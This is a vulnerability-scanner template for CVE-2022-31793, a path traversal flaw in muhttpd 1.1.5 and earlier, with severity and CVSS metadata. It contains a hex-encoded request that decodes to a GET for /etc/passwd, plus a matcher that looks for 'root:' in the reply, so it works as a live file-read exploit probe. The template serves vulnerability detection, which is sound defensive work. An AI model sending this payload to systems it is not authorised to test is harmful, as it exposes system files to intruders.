id: CVE-2022-31793

info:
  name: muhttpd <= 1.1.5 - Path traversal
  author: scent2d
  severity: high
  description: |
    A Path traversal vulnerability exists in versions muhttpd 1.1.5 and earlier. The vulnerability is directly requestable to files within the file system.
  reference:
    - https://derekabdine.com/blog/2022-arris-advisory.html
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31793
    - https://nvd.nist.gov/vuln/detail/CVE-2022-31793
    - https://derekabdine.com/blog/2022-arris-advisory
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-31793
    cwe-id: CWE-22
  metadata:
    verified: "true"
  tags: cve,cve2022,network,muhttpd,lfi,unauth

network:
  - host:
      - "{{Hostname}}"

    inputs:
      - data: "47455420612F6574632F706173737764"
        type: hex
      - data: "\n\n"

    read-size: 128
    matchers:
      - type: word
        part: body
        encoding: hex
        words:
          - "726f6f743a"